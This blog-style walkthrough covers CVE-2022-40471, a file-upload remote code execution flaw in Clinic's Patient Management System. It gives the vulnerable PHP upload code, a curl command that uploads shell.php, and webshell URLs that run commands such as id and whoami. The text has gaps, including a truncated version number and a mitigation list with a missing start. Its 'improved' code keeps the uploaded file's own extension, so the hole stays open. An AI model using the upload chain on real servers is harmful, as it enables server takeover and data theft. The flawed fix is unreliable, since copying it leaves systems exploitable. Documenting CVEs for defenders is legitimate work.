In 2022, a critical vulnerability was discovered and assigned as CVE-2022-40471, targeting Clinic's Patient Management System v1.. This bug makes it possible for anyone with minimal access to upload arbitrary PHP files—like webshells—through the profile picture upload feature found in users.php. In simple terms: an attacker can gain control over the server by disguising harmful scripts as images.
This post gives an exclusive walkthrough: what the vulnerability is, how it works, how attackers exploit it, and ways to fix or prevent it. This post is for educational purposes only.
What is Clinic's Patient Management System?
It's a web-based open-source software often used by clinics for managing patients, appointments, and other administrative tasks. Like many small projects, it sometimes overlooks strong security checks, especially on file uploads.
Reference Links
- Official CVE Details: CVE-2022-40471
- Github Vulnerability Database Entry
- PacketStorm Advisory
The Issue
The users.php file allows users to upload a profile picture, but it does not validate or restrict the file type, file extension, or actual file contents. This means an attacker can upload a .php file containing malicious code instead of a real image.
Sadly, the server saves uploaded files into a web-accessible directory, making it easy for an attacker to later run their script via the browser.
Affected Code (Typical Snippet)
Below is a simplified version, based on public sources, on how the server might be handling uploads inside users.php:
if(isset($_FILES['profile_pic'])){
$filename = $_FILES['profile_pic']['name'];
$filepath = "uploads/" . $filename;
move_uploaded_file($_FILES['profile_pic']['tmp_name'], $filepath);
}
Access the uploaded shell via browser:
E.g., http://target-site/uploads/shell.php?cmd=whoami
You can automate the upload with tools like curl. Here is an example
curl -X POST -F "profile_pic=@shell.php" http://target-site/users.php
Assuming the file gets uploaded, visit
http://target-site/uploads/shell.php?cmd=id
Result: The output of the id command appears in your browser.
Why Is This Dangerous?
- Full Remote Code Execution: The attacker has the same power as the web server user—steal data, change passwords, pivot inside the network.
Check file contents for PHP tags: Basic scanning can catch obvious payloads.
- Disable execution for upload directories: Configure your web server to not run PHP in upload folders.
Example Improved PHP Handling
$allowed_types = ['image/jpeg', 'image/png', 'image/gif'];
$filetype = mime_content_type($_FILES['profile_pic']['tmp_name']);
if(in_array($filetype, $allowed_types)){
$ext = pathinfo($_FILES['profile_pic']['name'], PATHINFO_EXTENSION);
$newname = uniqid() . '.' . $ext;
move_uploaded_file($_FILES['profile_pic']['tmp_name'], 'uploads/' . $newname);
} else {
echo "Invalid file type!";
}
Final Thoughts
CVE-2022-40471 is a textbook example of why file upload handling needs strict controls. In its default state, Clinic's Patient Management System v1. leaves the door wide open for full remote code execution via a trivial exploit.
If you use or manage this system—update, patch, and add file handling restrictions immediately!
Please use this knowledge responsibly. For more details and tools, check the original CVE description.
Timeline
Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 17:00:00 UTC